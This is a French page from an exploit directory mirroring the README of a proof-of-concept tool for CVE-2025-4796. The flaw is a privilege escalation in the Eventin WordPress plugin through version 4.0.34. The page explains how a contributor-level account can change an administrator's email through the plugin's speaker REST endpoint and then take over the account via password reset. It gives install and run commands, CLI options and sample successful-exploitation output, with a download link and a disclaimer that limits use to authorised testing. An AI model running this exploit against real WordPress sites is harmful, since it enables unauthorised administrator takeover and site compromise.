Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - Élévation de privilèges (Contributeur+) authentifiée via changement d'e-mail utilisateur / prise de contrôle du compte | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-4796
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et Éducation
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - Élévation de privilèges (Contributeur+) authentifiée via changement d'e-mail utilisateur / prise de contrôle du compte

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-4796

Eventin <= 4.0.34 - Élévation de privilèges authentifiée (Contributeur+) via le changement d'e-mail utilisateur / prise de contrôle de compte

🛡️ Eventin <= 4.0.34 - Élévation de privilèges authentifiée (Contributeur+) (CVE-2025-4796)

📌 Aperçu

Ce dépôt documente une vulnérabilité d'élévation de privilèges dans le plugin WordPress Eventin (<= 4.0.34) qui permet à un utilisateur authentifié disposant des capacités Contributeur+ de modifier les adresses e-mail d'utilisateurs arbitraires via l'API de mise à jour des intervenants du plugin. En modifiant l'e-mail d'un administrateur, un attaquant peut déclencher une réinitialisation de mot de passe et prendre le contrôle du compte.

  • Composant vulnérable : plugin WordPress Eventin (Eventin\Speaker\Api\SpeakerController::update_item)

  • Versions affectées : <= 4.0.34

  • CVE : CVE-2025-4796

  • CVSS : 8.8 (High)

  • Installations actives : 10,000+

⚠️ Détails de la vulnérabilité

Eventin ne valide pas correctement l'identité ou les capacités de l'appelant avant de mettre à jour les détails de l'intervenant/utilisateur (en particulier l'e-mail). Un attaquant authentifié en tant que contributeur (ou plus) peut modifier l'adresse e-mail d'autres utilisateurs — y compris les administrateurs — via le point de terminaison REST du plugin :

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

Une fois l'e-mail changé vers une adresse contrôlée par l'attaquant, le flux standard de réinitialisation de mot de passe de WordPress peut être utilisé pour prendre le contrôle du compte.

🧰 Script (PoC)

Nom du fichier : CVE-2025-4796.py

Ce script automatise les étapes suivantes :

  1. Se connecter au site WordPress cible avec les identifiants fournis.
  2. Extraire le X-WP-Nonce requis
  3. Envoyer une requête PUT vers /wp-json/eventin/v2/speakers/<speaker_id> pour mettre à jour l'e-mail de l'intervenant.
  4. Afficher et formater la réponse JSON ainsi qu'un message de réussite professionnel.

Prérequis :

  • Python 3.8+
  • requests

Installation :

root@kitploit:~
pip install requests

🚀 Utilisation

Exécutez le script depuis la ligne de commande :

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

Affichez l'aide du script :

root@kitploit:~
python CVE-2025-4796.py -h

📝 Options CLI (aide)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ Exemple de sortie réussie

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ Divulgation responsable et avertissement

  • Ce dépôt est fourni à des fins de recherche en sécurité, de test et de défense.
  • N'utilisez pas ces techniques contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester.
  • L'exploitation non autorisée de vulnérabilités est illégale et contraire à l'éthique.
  • Si vous êtes propriétaire d'un site et pensez être vulnérable, mettez à jour Eventin vers la dernière version ou appliquez immédiatement les correctifs du fournisseur.
  • N'utilisez ce code que dans des environnements autorisés (laboratoire, test d'intrusion approuvé par le client, ou avec une permission explicite).

🧾 Ce que fait le script (en bref)

  • Valide les entrées (URL, e-mail) et normalise le schéma d'URL.
  • Désactive les avertissements SSL (facultatif ; destiné à prendre en charge les tests d'instances de développement auto-signées).
  • Se connecte avec les identifiants WordPress fournis et valide la connexion via les cookies.
  • Récupère le X-WP-Nonce depuis la page d'administration.
  • Envoie une requête PUT authentifiée pour mettre à jour l'e-mail de l'intervenant.
  • Affiche la réponse JSON formatée et un récapitulatif final de succès lisible.

👤 Crédits

Par : Khaled Alenaz (Nxploited)
GitHub : https://github.com/Nxploited/

Télécharger l’outil